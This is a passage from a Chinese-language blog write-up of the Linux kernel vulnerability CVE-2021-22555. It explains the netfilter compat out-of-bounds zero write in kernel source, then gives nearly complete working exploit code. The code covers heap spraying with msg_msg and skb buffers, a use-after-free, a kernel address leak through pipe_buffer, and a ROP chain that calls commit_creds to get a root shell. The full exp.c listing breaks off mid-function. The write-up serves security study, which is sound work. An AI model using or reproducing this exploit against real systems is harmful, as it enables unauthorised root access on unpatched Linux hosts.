CVE-2021-22555

发表于 2022-03-31 分类于 kernel 阅读次数：本文字数： 27k 阅读时长 ≈ 25 分钟

从4字节堆溢出写0到UAF，再到提权，该 linux kernel 漏洞的利用思路非常值得学习
exploit

环境准备

漏洞影响的版本范围比较广，根据 google security-research 的描述，已经 patch 的版本有 5.12, 5.10.31, 5.4.113, 4.19.188, 4.14.231, 4.9.267, 4.4.267

这里偷懒选择已有的环境:
https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-22555

该内核版本为 5.11.14，稍后也以这个版本的源码来解析

漏洞分析

当在 64 位 linux 下，兼容运行 32 位程序，调用 setsockopt(sockfd, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data))时，内核会先调用 translate_compat_table 将 xt_table_info 32 位下的结构体转存储为 64 位模式的结构体：

/*
 * The table itself.
 *
 * Fixed-size header followed by the variable-length rule blob in @entries.
 * The accompanying article states that @entries holds an array of
 * struct ipt_entry records.
 */
struct xt_table_info {
	/* Size per table */
	unsigned int size;
	/* Number of entries: FIXME. --RR */
	unsigned int number;
	/* Initial number of entries. Needed for module usage count */
	unsigned int initial_entries;

	/* Entry points and underflows */
	unsigned int hook_entry[NF_INET_NUMHOOKS];
	unsigned int underflow[NF_INET_NUMHOOKS];

	/*
	 * Number of user chains. Since tables cannot have loops, at most
	 * @stacksize jumps (number of user chains) can possibly be made.
	 */
	unsigned int stacksize;
	void ***jumpstack;

	/* Flexible array member: rule data starts here, 8-byte aligned. */
	unsigned char entries[] __aligned(8);
};

其中 entries 字段指向的是由 ipt_entry 结构体组成的数组:

/*
 * One rule record. The record header is followed in @elems by the rule's
 * matches and then its target; @target_offset and @next_offset are byte
 * sizes measured from the start of this record.
 */
struct ipt_entry {
	struct ipt_ip ip;

	/* Mark with fields that we care about. */
	unsigned int nfcache;

	/* Size of ipt_entry + matches */
	__u16 target_offset;
	/* Size of ipt_entry + matches + target */
	__u16 next_offset;

	/* Back pointer */
	unsigned int comefrom;

	/* Packet and byte counters. */
	struct xt_counters counters;

	/* The matches (if any), then the target. */
	unsigned char elems[0];
};

其中的 target_offset 是相对于 ipt_entry 的偏移，指向了一个 xt_entry_target 结构体:

/*
 * Header placed in front of a target's payload (@data).
 *
 * The union offers three views that all begin with a __u16 target_size:
 * the userspace view (name + revision), the in-kernel view (pointer to the
 * resolved struct xt_target), and the bare length.
 */
struct xt_entry_target {
	union {
		struct {
			__u16 target_size;

			/* Used by userspace */
			char name[XT_EXTENSION_MAXNAMELEN];
			__u8 revision;
		} user;
		struct {
			__u16 target_size;

			/* Used inside the kernel */
			struct xt_target *target;
		} kernel;

		/* Total length */
		__u16 target_size;
	} u;

	/* Target-specific payload follows the header. */
	unsigned char data[0];
};

漏洞出在 translate_compat_table 调用的 xt_compat_target_from_user 中，它调用 memset(t->data + target->targetsize, 0, pad) 将对齐填充的空间清零：

/*
 * Convert one 32-bit (compat) target record into the native layout.
 *
 * @t:      on entry points at the compat-layout record (also viewed as
 *          @ct); it is then re-pointed at the destination *@dstptr.
 * @dstptr: in/out write cursor; advanced by the converted record size.
 * @size:   in/out running size; grows by the target's compat offset.
 *
 * The header is copied first, then the payload is either converted by the
 * target's compat_from_user hook or copied verbatim, then the alignment
 * padding after the payload is zeroed.
 */
void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
				unsigned int *size)
{
	const struct xt_target *target = t->u.kernel.target;
	struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
	int pad, off = xt_compat_target_offset(target);
	u_int16_t tsize = ct->u.user.target_size;
	char name[sizeof(t->u.user.name)];

	/* From here on t refers to the destination record, ct to the source. */
	t = *dstptr;
	memcpy(t, ct, sizeof(*ct));
	if (target->compat_from_user)
		target->compat_from_user(t->data, ct->data);
	else
		memcpy(t->data, ct->data, tsize - sizeof(*ct));
	pad = XT_ALIGN(target->targetsize) - target->targetsize;
	/*
	 * NOTE: per the accompanying article this memset is the
	 * CVE-2021-22555 out-of-bounds write: the destination buffer was
	 * sized without taking target->targetsize into account, so zeroing
	 * `pad` bytes at data + targetsize can run past the allocation.
	 */
	if (pad > 0)
		memset(t->data + target->targetsize, 0, pad);

	tsize += off;
	t->u.user.target_size = tsize;
	/*
	 * The name is staged in a local buffer before module_put() and only
	 * then written into the record - presumably so target->name is not
	 * read after the module reference is dropped (TODO confirm).
	 */
	strlcpy(name, target->name, sizeof(name));
	module_put(target->me);
	strncpy(t->u.user.name, name, sizeof(t->u.user.name));

	*size += off;
	*dstptr += tsize;
}

而在 translate_compat_table 调用 xt_alloc_table_info 处，对 size 的计算并没有 target->targetsize 的参与，而仅在 check_compat_entry_size_and_hooks 里，加上了为了对齐 matchsize 和 targetsize 的共 8 字节的大小，因此导致越界写 0 的效果

IPT_SO_SET_REPLACE 需要 CAP_NET_ADMIN 权限，但是这个权限可以在新建 user、network 的命名空间里获得

漏洞利用

xt_table_info

根据源码，可以分析出 xt_table_info 结构体的布局，如下图：

其中 match 和 target 的 data 字段都是大小可变的，转存储后，给 match 和 target 都加上了 4 字节的补齐，然后就是越界 memset 了

控制 targetsize

通过控制 targetsize ，则可以控制越界写 0，但是这个 targetsize 不能直接控制，通过选择不同的 target，对应不同的 targetsize，可以越界最多 0x4c 个字节，target 的选择在以下的调用链中check_compat_entry_size_and_hooks -> xt_request_find_target -> xt_find_target

/*
 * Look up a registered target by name and revision for address family @af.
 *
 * Returns the matching xt_target with a module reference taken via
 * try_module_get(), or an ERR_PTR:
 *   -EINVAL      @name has no NUL within XT_EXTENSION_MAXNAMELEN bytes
 *   -EPROTOTYPE  a target with that name exists but no revision matched
 *   -ENOENT      nothing with that name was found
 * If @af is not NFPROTO_UNSPEC and the lookup fails, the family-independent
 * list is searched as a fallback.
 */
static struct xt_target *xt_find_target(u8 af, const char *name, u8 revision)
{
	struct xt_target *t;
	int err = -ENOENT;

	if (strnlen(name, XT_EXTENSION_MAXNAMELEN) == XT_EXTENSION_MAXNAMELEN)
		return ERR_PTR(-EINVAL);

	/* The per-family target list is walked under the family mutex. */
	mutex_lock(&xt[af].mutex);
	list_for_each_entry(t, &xt[af].target, list) {
		if (strcmp(t->name, name) == 0) {
			if (t->revision == revision) {
				if (try_module_get(t->me)) {
					mutex_unlock(&xt[af].mutex);
					return t;
				}
			} else
				err = -EPROTOTYPE; /* Found something. */
		}
	}
	mutex_unlock(&xt[af].mutex);

	if (af != NFPROTO_UNSPEC)
		/* Try searching again in the family-independent list */
		return xt_find_target(NFPROTO_UNSPEC, name, revision);

	return ERR_PTR(err);
}

google security-research 中的 poc 所使用的 target 是 NFQUEUE，它在 nfqueue_tg_init 中注册到 xt 变量里：

/*
 * Registration table for the "NFQUEUE" target. It lists four entries with
 * the same name; the first omits .revision (so it is zero-initialised) and
 * the others are revisions 1-3. Each revision has its own handler and its
 * own targetsize, taken from the matching xt_NFQ_info* structure.
 */
static struct xt_target nfqueue_tg_reg[] __read_mostly = {
	{
		.name		= "NFQUEUE",
		.family		= NFPROTO_UNSPEC,
		.target		= nfqueue_tg,
		.targetsize	= sizeof(struct xt_NFQ_info),
		.me		= THIS_MODULE,
	},
	{
		.name		= "NFQUEUE",
		.revision	= 1,
		.family		= NFPROTO_UNSPEC,
		.checkentry	= nfqueue_tg_check,
		.target		= nfqueue_tg_v1,
		.targetsize	= sizeof(struct xt_NFQ_info_v1),
		.me		= THIS_MODULE,
	},
	{
		.name		= "NFQUEUE",
		.revision	= 2,
		.family		= NFPROTO_UNSPEC,
		.checkentry	= nfqueue_tg_check,
		.target		= nfqueue_tg_v2,
		.targetsize	= sizeof(struct xt_NFQ_info_v2),
		.me		= THIS_MODULE,
	},
	{
		.name		= "NFQUEUE",
		.revision	= 3,
		.family		= NFPROTO_UNSPEC,
		.checkentry	= nfqueue_tg_check,
		.target		= nfqueue_tg_v3,
		.targetsize	= sizeof(struct xt_NFQ_info_v3),
		.me		= THIS_MODULE,
	},
};

可以看到这个 xt_NFQ_info_v1 结构体，只有 4 个字节，也就是 targetsize 为 4 个字节，计算得 pad = 4：

/*
 * Payload of the NFQUEUE revision-1 target: two 16-bit fields, 4 bytes in
 * total, which is the targetsize the article relies on (pad = 4).
 */
struct xt_NFQ_info_v1 {
	__u16 queuenum;
	__u16 queues_total;
};

这样就可以越界写 4 字节的 0，通过调整 t->data 的位置，可以让它只改写某个指针的低两字节，后面的利用中，就是把这两字节的指针改写转化为 UAF，再进行权限提升

2 字节溢出写 0

选择 xt_NFQ_info_v1，则可以 memset 4 个字节，可以想到的是，溢出写 0 用来改写某些结构体的指针来进一步利用，比如说 msg_msg.m_list.next 指针，但是改写指针低 4 个字节为 0 很可能不会得到一个有效的指针，所以需要做一下调整，只改指针低两字节则很可能得到一个有效的指针

通过调整 match 的 data 部分的大小，让 xt_table_info 结构体从一个页也就是 4K 大小中分配，并且 memset 刚好改写相邻的下一个页的低两字节，具体如下：

int trigger_oob_write(int s)
{
    struct __attribute__((__packed__))
    {
        struct ipt_replace replace;  // 0x5c
        struct ipt_entry entry;      // 0x70
        struct xt_entry_match match; // 0x20
        char match_data[PAGE_SIZE - 0x40 - sizeof(struct ipt_entry) - sizeof(struct xt_entry_match) - sizeof(struct xt_entry_target) - 8 - 2];
        struct xt_entry_target target; // 0x20
    } data = {0};

    data.replace.num_counters = 1;
    data.replace.num_entries = 1;
    data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
                         sizeof(data.match_data) + sizeof(data.target)); 

    data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
                              sizeof(data.match_data) + sizeof(data.target)); 
    data.entry.target_offset =
        (sizeof(data.entry) + sizeof(data.match) + sizeof(data.match_data)); 

    data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.match_data)); 
    strcpy(data.match.u.user.name, "icmp");
    data.match.u.user.revision = 0;

    data.target.u.user.target_size = sizeof(data.target); // 0x20
    strcpy(data.target.u.user.name, "NFQUEUE");
    data.target.u.user.revision = 1;

    // Partially overwrite the adjacent buffer with 2 bytes of zero.
    if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0)
    {
        if (errno == ENOPROTOOPT)
        {
            printf("[-] error ip_tables module is not loaded.\n");
            return -1;
        }
    }

    return 0;
}

此时 memset 如下：

memset(t->data + target->targetsize, 0, 4);
->
memset(newinfo->entries + target_offset + 0x20(offset of data == sizeof(xt_entry_target)) + 4(target->targetsize), 0, 4);
->
memset(newinfo + 0x40 + target_offset + 0x20 + 4, 0, 4);
->
memset(newinfo + 0x40 + 0x70(sizeof ipt_entry) + 0x20(sizeof xt_entry_match) + match_data + 4(align matchsize) + 0x20 + 4, 0, 4)
->
memset(newinfo + PAGE_SIZE - 8 - 2 + 4(align matchsize) + 4(target->targetsize), 0, 4)
->
memset(newinfo + PAGE_SIZE - 2, 0, 4)

off-by-2null

UAF

构造主消息与副消息

创建 4096 个消息队列，填充 0x1000 大小的主消息

struct
{
    long mtype;
    char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;
...

int write_msg(int id, const void *msgp, size_t msgsz, long msgtyp)
{
    *(long *)msgp = msgtyp;
    if (msgsnd(id, msgp, msgsz - sizeof(long), 0) < 0) {
        perror("[-] msgsnd");
        return -1;
    }

    return 0;
}
...

    puts("[*] Spraying primary messages...");
    for (int i = 0; i < NUM_MSQIDS; i++) {
        memset(&msg_primary, 0, sizeof(msg_primary));
        *(int *)&msg_primary.mtext[0] = MSG_TAG;
        *(int *)&msg_primary.mtext[4] = i;

        if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0) {
            goto ret;
        }
    }

再填充大小为 0x400 的副消息：

struct
{
    long mtype;
    char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;
...

    puts("[*] Spraying secondary messages...");
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        memset(&msg_secondary, 0, sizeof(msg_secondary));
        *(int *)&msg_secondary.mtext[0] = MSG_TAG;
        *(int *)&msg_secondary.mtext[4] = i;

        if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
            goto ret;
    }

Copy 一张图，如下：
messages
注意：图中的 next 指 msg_msg->m_list->next 而不是 msg_msg->next

其中的 *(int *)&mtext[0] = MSG_TAG 用来标记该区域是消息内容区域，*(int *)&mtext[4] = i 用来标记好这个消息是哪个消息队列的消息，当漏洞触发时，next 指向改变，则主消息和副消息的 *(int *)&mtext[4] 值不一样，这样可以找到是哪个 msg_msg 结构体被更改了

制造空洞为 xt_table_info 占位做准备

间隔 1024，释放部分主消息，使得后面 xt_table_info 分配到这些空洞中

int read_msg(int id, void *msgp, size_t msgsz, long msgtyp)
{
    if (msgrcv(id, msgp, msgsz - sizeof(long), msgtyp, 0) < 0)
    {
        perror("[-] msgrcv");
        return -1;
    }

    return 0;
}
...

    puts("[*]  Creating holes in primary messages...");
    for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP)
    {
        if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
            goto ret;
    }

再 Copy 一张图：
free

触发漏洞，搜索被破坏的主消息

触发 2 字节溢出写 0 后，更改了某个 msg_msg 的 m_list.next 指针，也就是副消息会指向其他地方，很可能就是另外某个主消息的副消息，利用 msgrcv 的 MSG_COPY 标志读取副消息，而不释放副消息，对比主副消息的 *(int *)&mtext[4] 是否一致，即可找到目标消息队列：

int peek_msg(int id, void *msgp, size_t msgsz, long index)
{
    if (msgrcv(id, msgp, msgsz - sizeof(long), index, MSG_COPY | IPC_NOWAIT) < 0)
    {
        perror("[-] msgrcv");
        return -1;
    }

    return 0;
}
...

    puts("[*] Trigger oob write");
    if (trigger_oob_write(s) < 0) {
        perror("trigger_oob_write");
        goto ret;
    }

    puts("[*] Searching for corrupted primary message...");
    int fake_id = -1, real_id = -1;
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        if (i != 0 && !(i % HOLE_STEP))
            continue;

        if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
            goto ret;

        if (*(int *)&msg_secondary.mtext[0] != MSG_TAG)
        {
            printf("[-] MSG_TAG error\n");
            goto ret;
        }

        if (*(int *)&msg_secondary.mtext[4] != i)
        {
            real_id = *(int *)&msg_secondary.mtext[4];
            fake_id = i;
            break;
        }
    }

    if (real_id == -1 && fake_id == -1)
    {
        printf("[-] Could not corrupt any primary message\n");
        goto ret;
    }

    printf("[+] real_id = %#x, fake_id = %#x\n", real_id, fake_id);

如图：
corrupt

释放副消息造成 UAF

利用 real_id 读取释放副消息，fake_id 的副消息指向已经释放的消息，则造成 UAF

puts("[*] Free secondary message and then gain UAF");
/* real_id is an index into msqid[], not a queue id, so look the id up
 * (this matches the same step in the complete listing). */
if (read_msg(msqid[real_id], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
    goto ret;

如图：
trigger UAF

有了 UAF 后，这里大致描述下利用思路

skb 堆喷占位，伪造副消息
fake_id peek 副消息来 leak 堆地址
释放 skb ，利用 leak 出的堆地址来 skb 堆喷伪造合法的副消息
fake_id read 释放副消息，因为此时副消息的指针都合法可以脱链
pipe_buffer 堆喷占位
读取并释放 skb，读到 pipe_buffer 的内容，泄露 kernel 地址
skb 堆喷劫持 pipe_buffer->ops
close pipe，劫持程序执行流提权

skb 堆喷伪造副消息

首先得先泄露堆地址，用于后面伪造合法的副消息

leak heap

利用 skb 堆喷伪造副消息，伪造 m_ts，利用 fake_id 队列 peek 副消息，即可越界读到相邻的副消息的 msg_msg 结构体，可以泄露 msg_msg->m_list->next 和 msg_msg->m_list->prev 堆地址

struct msg_msg
{
    uint64_t m_list_next;
    uint64_t m_list_prev;
    uint64_t m_type;
    uint64_t m_ts;
    uint64_t next;
    uint64_t security;
};

struct
{
    long mtype;
    char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;
...

void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_ts, uint64_t next)
{
    msg->m_list_next = m_list_next;
    msg->m_list_prev = m_list_prev;
    msg->m_type = MTYPE_FAKE;
    msg->m_ts = m_ts;
    msg->next = next;
    msg->security = 0;
}

int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size)
{
    for (int i = 0; i < NUM_SOCKETS; i++)
    {
        for (int j = 0; j < NUM_SKBUFFS; j++)
        {
            if (write(ss[i][0], buf, size) < 0)
            {
                perror("[-] write");
                return -1;
            }
        }
    }
    return 0;
}
...

    int ss[NUM_SOCKETS][2];
    char primary_buf[PRIMARY_SIZE - SKB_SHARED_INFO_SIZE];
    char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE];
    struct msg_msg *msg;
    uint64_t kheap;
...

    puts("[*] Free secondary message and then gain UAF");
    if (read_msg(msqid[real_id], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
        goto ret;

    puts("[*] Spraying fake secondary messages...");
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, PAGE_SIZE - MSG_MSG_SIZE, 0);
    if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    puts("[*] Leaking adjacent secondary message...");
    if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
        goto ret;

    if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG)
    {
        printf("[-] Could not leak adjacent secondary message");
        goto ret;
    }

    msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
    kheap = msg->m_list_next; // kheap pointer to the primary message
    if (kheap & (PRIMARY_SIZE - 1))
        kheap = msg->m_list_prev;
    printf("[+] kheap = %#" PRIx64 "\n", kheap);

此时的 kheap 就是相邻副消息的 m_list->next 或者 m_list->prev，指向的就是他对应的主消息
leak kheap

leak address of msg_fake

释放 skb，然后伪造 msg_msg->next=kheap-MSG_MSGSEG_SIZE，也就是让这个主消息成为这个副消息的 msg_msgseg 结构，这样读取副消息的时候，就能把这个主消息也读出来，就能读到 m_list->next 也就是 msg_fake 相邻副消息的地址，减去 SECONDARY_SIZE 就是 msg_fake 的地址：


puts("[*] Freeing skb...");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto ret;

puts("[*] Spraying fake secondary messages...");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap - MSG_MSGSEG_SIZE);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto ret;

puts("[*] Leaking address of msg_fake");
if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto ret;

if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG)
{
    printf("[-] Could not leak address of msg_fake\n");
    goto ret;
}

msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE-MSG_MSG_SIZE];
msg_fake_addr = msg->m_list_next;
if (msg_fake_addr & (SECONDARY_SIZE - 1))
    msg_fake_addr = msg->m_list_prev;
msg_fake_addr -= SECONDARY_SIZE;
printf("[+] address of msg_fake = %#" PRIx64 "\n", msg_fake_addr);

伪造合法副消息并释放，构造 skb 可控的 UAF

有了 msg_fake 的地址，只要让 msg_fake->m_list->next = msg_fake_addr，随后释放副消息即可成功脱链，留下一块 skb 指向的 free 掉的内存：

puts("[*] Free secondary message and then gain UAF controlled by skb");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto ret;

build_msg_msg((struct msg_msg *)secondary_buf, msg_fake_addr, msg_fake_addr, 0, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto ret;

if (read_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
    goto ret;

大概就像这样
UAF2

skb & pipe_buffer 的 UAF 利用思路

leak kernel base

堆喷 pipe_buffer，利用 skb read 泄露 ops 指针，计算出 kernel 基址：


puts("[*] Spraying pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
    if (pipe(pipefd[i]) < 0)
    {
        perror("[-] pipe");
        goto ret;
    }

    if (write(pipefd[i][1], "xi4oyu", 6) < 0)
    {
        perror("[-] write");
        goto ret;
    }
}

puts("[*] Leaking and freeing pipe_buffer object...");
for (int i = 0; i < NUM_SOCKETS; i++)
{
    for (int j = 0; j < NUM_SKBUFFS; j++)
    {
        if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0)
        {
            perror("[-] read");
            goto ret;
        }

        if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE) {
            pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
            break;
        }
    }
}

kernel_offset  = pipe_buffer_ops - 0xffffffff8223e140;  // anon_pipe_buf_ops
kernel_base = kernel_offset + 0xffffffff81000000;
printf("[+] pipe_buffer_ops = %#" PRIx64 "\n", pipe_buffer_ops);
printf("[+] kernel_base = %#" PRIx64 "\n", kernel_base);
printf("[+] kernel_offset = %#" PRIx64 "\n", kernel_offset);

hijack control flow

skb 堆喷伪造 pipe_buffer，劫持 ops 指针，劫持程序控制流，当关闭管道时，最后进入下面的函数释放 pipe_buffer，可知 rsi 指向 pipe_buffer，可以栈迁移到 pipe_buffer，随后 ROP

/*
 * Release one pipe buffer: fetch its operations table, clear buf->ops, then
 * invoke the table's release() callback with (pipe, buf).
 *
 * The ops pointer is read from the buffer itself, which is why the article
 * treats a controlled buf->ops as a control-flow primitive; @buf is passed
 * as the second argument of the callback.
 */
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
				    struct pipe_buffer *buf)
{
	const struct pipe_buf_operations *ops = buf->ops;

	buf->ops = NULL;
	ops->release(pipe, buf);
}

ROP 执行 commit_creds(&init_cred) 提权，平衡栈最后回到用户态起 shell 即可，具体操作如下：

puts("[*] Spraying fake pipe_buffer...");
memset(secondary_buf, 0, sizeof(secondary_buf));
buf = (struct pipe_buffer *)secondary_buf;
buf->ops = msg_fake_addr + 0x200;
ops = (struct pipe_buf_operations *)&secondary_buf[0x200];

ops->release = kernel_offset + 0xffffffff8172e1ac; // push rsi ; jmp qword ptr [rsi + 0x39]

*(uint64_t *)&secondary_buf[0] = kernel_offset + 0xffffffff8106f8c9;  // add rsp, 0xd0 ; ret
*(uint64_t *)&secondary_buf[0x39] = kernel_offset + 0xffffffff81163ea0;  // pop rsp ; ret
rop = (uint64_t *)&secondary_buf[0xd0 + 8];
ridx = 0;
rop[ridx++] = kernel_offset + 0xffffffff8108c650;  // pop rdi ; ret
rop[ridx++] = kernel_offset + 0xffffffff8286b780;  // init_cred
rop[ridx++] = kernel_offset + 0xffffffff810c9f00;  // commit_creds
rop[ridx++] = kernel_offset + 0xffffffff8108c5bc;  // mov rsp, rbp ; pop rbp ; ret

if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto ret;

puts("[*] Releasing pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
    if (close(pipefd[i][0]) < 0)
    {
        perror("[-] close");
        goto ret;
    }
    if (close(pipefd[i][1]) < 0)
    {
        perror("[-] close");
        goto ret;
    }
}

system("/bin/sh");

exp

完整 exp 如下：

// gcc -m32 -static -o exp exp.c
#define _GNU_SOURCE
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <string.h>
#include <stdint.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <err.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netfilter/x_tables.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <sched.h>
#include <inttypes.h>

#define PAGE_SIZE 0x1000
#define PRIMARY_SIZE 0x1000
#define SECONDARY_SIZE 0x400

#define NUM_SOCKETS 4
#define NUM_SKBUFFS 128
#define NUM_PIPEFDS 128
#define NUM_MSQIDS 4096

#define HOLE_STEP 1024

#define MTYPE_PRIMARY 0x41
#define MTYPE_SECONDARY 0x42
#define MTYPE_FAKE 0x1337

#define MSG_TAG 0xAAAAAAAA

#define SKB_SHARED_INFO_SIZE 0x140
#define MSG_MSG_SIZE (sizeof(struct msg_msg))
#define MSG_MSGSEG_SIZE (sizeof(struct msg_msgseg))

/*
 * Userspace image of a message header, used to lay out and parse raw bytes
 * in the exploit's buffers. All six members are explicit uint64_t, so
 * sizeof (MSG_MSG_SIZE) is 0x30 even though the file is built with -m32.
 * m_type sits at offset 0x10, which is the offset main() inspects in the
 * data it reads back.
 */
struct msg_msg
{
    uint64_t m_list_next;
    uint64_t m_list_prev;
    uint64_t m_type;
    uint64_t m_ts;
    uint64_t next;
    uint64_t security;
};

/*
 * Userspace image of a message-segment header: a single 64-bit link field.
 * Only its size (MSG_MSGSEG_SIZE, 8 bytes) is used by this file.
 */
struct msg_msgseg
{
    uint64_t next;
};

/*
 * Userspace image of a pipe buffer descriptor with fixed-width members.
 * With this layout `ops` lands at offset 0x10 (8 + 4 + 4), the offset
 * main() reads the leaked pointer from.
 */
struct pipe_buffer
{
    uint64_t page;
    uint32_t offset;
    uint32_t len;
    uint64_t ops;
    uint32_t flags;
    uint32_t pad;
    uint64_t private;
};

/*
 * Userspace image of a pipe-buffer operations table: four 64-bit slots.
 * main() only fills in `release`, the second slot.
 */
struct pipe_buf_operations
{
    uint64_t confirm;
    uint64_t release;
    uint64_t steal;
    uint64_t get;
};

/*
 * File-scope message buffers in msgsnd()/msgrcv() layout (long mtype
 * followed by the text). Each text area is sized as "target allocation size
 * minus header size".
 */

/* Primary message: PRIMARY_SIZE minus one msg_msg header. */
struct
{
    long mtype;
    char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;

/* Secondary message: SECONDARY_SIZE minus one msg_msg header. */
struct
{
    long mtype;
    char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;

/*
 * Receive buffer for the oversized reads: one page minus a msg_msg header
 * plus one page minus a msg_msgseg header.
 */
struct
{
    long mtype;
    char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;

/*
 * Final step of the PoC: report the return to userspace, check whether the
 * process now has uid 0, and if so start /bin/sh. Never returns - the
 * process always leaves through exit().
 */
void getRootShell(void)
{
    puts("\033[32m\033[1m[+] Backing from the kernelspace.\033[0m");

    if (getuid() == 0)
    {
        puts("\033[32m\033[1m[+] Successful to get the root. Execve root shell "
             "now...\033[0m");
        system("/bin/sh");
        /* exit explicitly so the process ends normally instead of with a
         * segmentation fault */
        exit(0);
    }

    puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
    exit(-1);
}

/*
 * Build a single-rule IPT_SO_SET_REPLACE request and submit it on socket @s.
 *
 * The request is a packed blob: ipt_replace header, one ipt_entry, one
 * "icmp" match with a large data area, and one "NFQUEUE" revision-1 target.
 * match_data is sized so that, per the article's arithmetic, the converted
 * table ends 2 bytes before a page boundary once the fixed 0x40 header and
 * the 8 bytes of alignment slack are added.
 *
 * Returns -1 only when setsockopt() fails with ENOPROTOOPT (reported as
 * "ip_tables module is not loaded"); any other outcome, including other
 * setsockopt() failures, returns 0.
 */
int trigger_oob_write(int s)
{
    struct __attribute__((__packed__))
    {
        struct ipt_replace replace;  // 0x5c
        struct ipt_entry entry;      // 0x70
        struct xt_entry_match match; // 0x20
        char match_data[PAGE_SIZE - 0x40 - sizeof(struct ipt_entry) - sizeof(struct xt_entry_match) - sizeof(struct xt_entry_target) - 8 - 2];
        struct xt_entry_target target; // 0x20
    } data = {0};

    data.replace.num_counters = 1;
    data.replace.num_entries = 1;
    /* Table size covers everything after the ipt_replace header. */
    data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
                         sizeof(data.match_data) + sizeof(data.target));

    /* One entry only, so next_offset equals the table size. */
    data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
                              sizeof(data.match_data) + sizeof(data.target));
    data.entry.target_offset =
        (sizeof(data.entry) + sizeof(data.match) + sizeof(data.match_data));

    data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.match_data));
    strcpy(data.match.u.user.name, "icmp");
    data.match.u.user.revision = 0;

    data.target.u.user.target_size = sizeof(data.target); // 0x20
    strcpy(data.target.u.user.name, "NFQUEUE");
    data.target.u.user.revision = 1;

    // Partially overwrite the adjacent buffer with 2 bytes of zero.
    if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0)
    {
        /* Only a missing protocol option is treated as fatal here. */
        if (errno == ENOPROTOOPT)
        {
            printf("[-] error ip_tables module is not loaded.\n");
            return -1;
        }
    }

    return 0;
}

/*
 * Prepare the process environment: enter a new user namespace, then a new
 * network namespace, then pin the process to CPU 0.
 *
 * Returns 0 on success, or -1 after printing the failing step via perror().
 */
int setup_sandbox(void)
{
    static const struct
    {
        int flag;
        const char *what;
    } namespaces[] = {
        {CLONE_NEWUSER, "[-] unshare(CLONE_NEWUSER)"},
        {CLONE_NEWNET, "[-] unshare(CLONE_NEWNET)"},
    };
    cpu_set_t cpus;

    /* Order matters: the user namespace is created before the network one. */
    for (size_t k = 0; k < sizeof(namespaces) / sizeof(namespaces[0]); k++)
    {
        if (unshare(namespaces[k].flag) < 0)
        {
            perror(namespaces[k].what);
            return -1;
        }
    }

    CPU_ZERO(&cpus);
    CPU_SET(0, &cpus);
    if (sched_setaffinity(getpid(), sizeof(cpus), &cpus) >= 0)
        return 0;

